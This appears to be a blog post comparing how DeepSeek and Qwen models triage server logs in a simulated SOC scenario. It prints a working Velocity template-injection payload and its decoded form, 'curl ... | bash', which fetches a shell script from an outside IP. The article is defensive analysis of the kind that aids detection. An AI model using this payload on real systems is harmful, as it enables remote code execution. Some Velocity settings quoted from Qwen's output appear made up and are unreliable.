
Saranyo Deyasi


Decoding AI #1: Breaking LLMs with Obfuscated Log Malice (DeepSeek vs. Qwen)

The AI industry loves automated benchmarks. We hear about massive context windows, MMLU scores, and high-level coding capabilities every single day. But how do these frontier open-weight models actually perform when thrown into a chaotic, real-world scenario where data isn’t clean, formatting is strict, and a security incident is active?
Welcome to Decoding AI, a research series where we ditch the standardized tests and put today's top models through manual, adversarial, real-world gauntlets.
In our first evaluation, we are stepping into the shoes of a Tier 3 SOC Analyst to run The Obfuscated Log Malice Test. We are pitting DeepSeek V4 Flash against Qwen 3.6 to see which model can accurately spot, decode, and remediate a stealthy, multi-stage cyber threat hidden inside raw server traffic.

The Adversarial Gauntlet
Standard LLMs are great at analyzing clean Python or JavaScript files. They struggle significantly when payloads are embedded inside raw log architecture, multi-turn strings, or hidden behind basic encodings.
To test their limits, we presented both models with a dense text file containing four distinct inbound connection logs. Three were benign or typical authentication failures. The fourth contained an active exploitation attempt targeting a server-side template engine, with the shell command inside its payload hidden behind a single layer of Base64:

DATA="{\"template_id\":\"492\",\"engine\":\"velocity\",\"payload\":\"$class.inspect('java.lang.Runtime').getRuntime().exec($string.decodeBase64('Y3VybCAtcyBodHRwOi8vMTg1LjIyMC4xMDEuNS9zaGVsbC5zaCB8IGJhc2g='))\"}"
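For readers who want to check the decoding step themselves, here is a minimal Python sketch. It pulls the argument of `$string.decodeBase64('...')` out of the field shown above and decodes it with the standard library. The regex and the helper name `decode_embedded_base64` are assumptions made for this illustration; they are not part of the prompt given to either model.

```python
import base64
import re

# The DATA field from the malicious log entry, copied from the article.
LOG_DATA = r'''{\"template_id\":\"492\",\"engine\":\"velocity\",\"payload\":\"$class.inspect('java.lang.Runtime').getRuntime().exec($string.decodeBase64('Y3VybCAtcyBodHRwOi8vMTg1LjIyMC4xMDEuNS9zaGVsbC5zaCB8IGJhc2g='))\"}'''

# Hypothetical pattern: the single-quoted argument of decodeBase64(...).
B64_CALL = re.compile(r"decodeBase64\('([A-Za-z0-9+/=]+)'\)")


def decode_embedded_base64(text: str) -> list[str]:
    """Return the decoded form of every decodeBase64('...') argument in text."""
    return [
        base64.b64decode(encoded, validate=True).decode("utf-8", errors="replace")
        for encoded in B64_CALL.findall(text)
    ]


if __name__ == "__main__":
    for command in decode_embedded_base64(LOG_DATA):
        print(command)  # curl -s http://185.220.101.5/shell.sh | bash
```

Base64 is an encoding rather than encryption, so no key is involved; anything that can read the log can recover the command.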

The Evaluation Criteria:

  1. Instruction Adherence: The model must skip all polite conversational introductions ("Here is your analysis...") and drop directly into a Markdown matrix table.
  2. Cryptographic Precision: The model must accurately extract and translate the Base64 string (Y3V...=) to reveal the exact command and malicious IP.
  3. Domain Classification: The model must correctly categorize the unique exploit style instead of defaulting to generic catch-all terms like SQL Injection.
  4. Actionable Remediation: The model must provide immediate, technical steps based on the fact that the log returned an HTTP 200 OK status code.

The Showdown: Raw Model Outputs
Contender 1: DeepSeek V4 Flash
Immediate blocking: Add a WAF rule to block requests containing Velocity template syntax ($class.inspect, $string.decodeBase64) in POST data, and restrict outbound HTTP access from the application server.

Patch & validate: Review the Velocity engine configuration to disable dangerous built‑in classes (java.lang.Runtime, java.lang.ProcessBuilder), and apply the latest security patches for the reporting endpoint.

Containment & forensics: Isolate the compromised server (10.0.4.12) immediately; capture memory and disk images for analysis, and check for any established reverse shells or scheduled tasks.

Contender 2: Qwen 3.6

Sandbox Velocity Rendering: Immediately restrict the Velocity runtime configuration by disabling RuntimeMetricsMerger, removing access to java.lang.Runtime/java.lang.ProcessBuilder via Uberspect, and enforcing RuntimeRuntimeClassSecurityVM to prevent dynamic class introspection.

Enforce Strict Input Sanitization: Deploy parameterized validation on template_id and payload fields to reject raw VTL directives ($class, $string, #set, #foreach) and block multi-stage obfuscation attempts before they reach the template engine.

WAF & EDR Tuning: Update application-layer WAF signatures to detect Velocity Expression Language payloads and pipe-based shell execution patterns, while configuring EDR to monitor for anomalous child processes spawned from the Java web server runtime.
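Both outputs recommend catching Velocity template syntax before it reaches the engine. As a rough illustration of that idea, the Python sketch below flags request bodies containing the references and directives the models named. It is not a production WAF rule and not either model's output; the pattern list and the name `contains_vtl` are assumptions for this example, and a signature match like this is easy to evade, so it would only complement sandboxing the engine itself.

```python
import re

# Illustrative patterns based on the syntax named in the model outputs:
# tool references ($class, $string) and VTL directives (#set, #foreach).
VTL_PATTERNS = [
    re.compile(r"\$\{?class\b"),
    re.compile(r"\$\{?string\b"),
    re.compile(r"#set\s*\("),
    re.compile(r"#foreach\s*\("),
]


def contains_vtl(body: str) -> bool:
    """Return True if the request body matches any of the VTL patterns."""
    return any(pattern.search(body) for pattern in VTL_PATTERNS)


if __name__ == "__main__":
    print(contains_vtl("$class.inspect('java.lang.Runtime')"))
    print(contains_vtl('{"template_id": "492"}'))
```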

Technical Deep-Dive: Who Won?
Neither model refused the task on safety grounds; both recognized that analyzing a payload in a SOC scenario is a defensive role. Both also decoded the string accurately, recovering the core command: curl -s http://185.220.101.5/shell.sh | bash.

However, the execution strategies diverged massively.

  1. The Layout and Adherence Metric (Winner: DeepSeek)

DeepSeek respected the prompt constraints: it skipped the conversational preamble and produced a cleanly formatted, easily scannable Markdown table.

Qwen stumbled on the layout. It clumped headers together, dropped the standard pipe separators, and lost structural integrity, leaving the first table cells unreadable. If this output were fed directly into a parser behind a React or Vue dashboard, it could have broken the UI component unless the parser validated its input first.
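The dashboard concern is usually handled by validating model output before rendering it. Here is a minimal Python sketch, assuming a GitHub-style pipe table (header row, delimiter row, data rows) at the very start of the response. The function names and the strictness of the checks are assumptions for illustration; a real pipeline might prefer asking the model for JSON instead.

```python
import re
from typing import Optional

# A delimiter cell such as ---, :---, or :---:
DELIMITER_CELL = re.compile(r"^:?-+:?$")
# Split on pipes that are not escaped as \|
UNESCAPED_PIPE = re.compile(r"(?<!\\)\|")


def split_row(line: str) -> list[str]:
    """Split one table line into trimmed cells, unescaping \\| inside cells."""
    inner = line.strip().strip("|")
    return [cell.strip().replace("\\|", "|") for cell in UNESCAPED_PIPE.split(inner)]


def parse_leading_table(text: str) -> Optional[list[dict[str, str]]]:
    """Parse the table that opens the response; return None if it is malformed."""
    table_lines = []
    for line in text.strip().splitlines():
        if not line.strip().startswith("|"):
            break  # the table ends at the first non-table line
        table_lines.append(line)
    if len(table_lines) < 2:
        return None  # no header + delimiter row, e.g. a chatty intro came first
    header = split_row(table_lines[0])
    delimiter = split_row(table_lines[1])
    if len(delimiter) != len(header) or not all(DELIMITER_CELL.match(c) for c in delimiter):
        return None
    rows = []
    for line in table_lines[2:]:
        cells = split_row(line)
        if len(cells) != len(header):
            return None  # ragged row: reject rather than guess
        rows.append(dict(zip(header, cells)))
    return rows
```

Returning `None` lets the caller show a fallback view or retry the request instead of passing broken rows to the UI. Note that a cell containing `| bash` must have its pipe escaped as `\|` to survive as a single cell.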

  2. Incident Response Triage vs. Engineering Remediation

This is where the evaluation gets interesting. Depending on your operational role, the two models offer different kinds of value.

DeepSeek is the stronger incident responder: it picked up on the critical detail that the target log entry returned RES=200, an HTTP 200 response. That means the request was served rather than rejected, so the exploitation attempt should be treated as a likely success and not just a probe. DeepSeek immediately shifted to containment: isolating host 10.0.4.12, capturing memory and disk images, and hunting for active reverse shells.
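The triage logic described here, where a malicious payload plus a success status means containment, can be sketched in a few lines of Python. The only thing taken from the test log is the `RES=<code>` field; the rest of the line layout is unknown, so the sample lines, the indicator list, and the action labels below are all hypothetical.

```python
import re
from typing import Optional

# Assumption: the log carries the HTTP status as a RES=<code> field.
STATUS_FIELD = re.compile(r"\bRES=(\d{3})\b")
# Illustrative indicators drawn from the payload shown earlier.
INDICATORS = ("java.lang.Runtime", "decodeBase64", ".exec(")


def extract_status(line: str) -> Optional[int]:
    """Return the HTTP status from a RES= field, or None if it is absent."""
    match = STATUS_FIELD.search(line)
    return int(match.group(1)) if match else None


def triage(line: str) -> str:
    """Map one log line to a coarse, hypothetical response action."""
    if not any(token in line for token in INDICATORS):
        return "no-action"
    status = extract_status(line)
    if status is not None and 200 <= status < 300:
        # The request was served, so assume the payload may have executed.
        return "contain-host"
    # Rejected or unknown status: more likely a failed probe.
    return "block-and-monitor"


if __name__ == "__main__":
    # Hypothetical log lines, not taken from the test file.
    print(triage("POST /report RES=200 DATA=$class.inspect('java.lang.Runtime')"))
    print(triage("POST /report RES=403 DATA=$class.inspect('java.lang.Runtime')"))
```

A 200 status does not prove the command ran, which is why the sketch only escalates to containment and leaves confirmation to forensics.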

Qwen is the stronger system-hardening architect: while it dropped the ball on layout, its remediation went deep into the Java framework itself. Instead of generic advice, it pointed at Apache Velocity's runtime configuration, in particular using Uberspect (introspection) controls to stop the template renderer from reaching classes such as java.lang.Runtime and java.lang.ProcessBuilder. The exact identifiers it named should be verified against the Velocity documentation before being applied.

Final Verdict
For immediate production use inside a Security Operations Center where readability, formatting stability, and emergency triage priority matter most, DeepSeek V4 Flash claims a definitive victory.

However, do not count Qwen out; its ability to surface deep system configuration variables makes it an incredible asset for the long-term code-patching phase once the initial fires are put out.

What are your thoughts on how these open-weight models handle obfuscation? Stay tuned for tomorrow's entry in our "Decoding AI" series, where we take on multi-turn conversational jailbreaks!
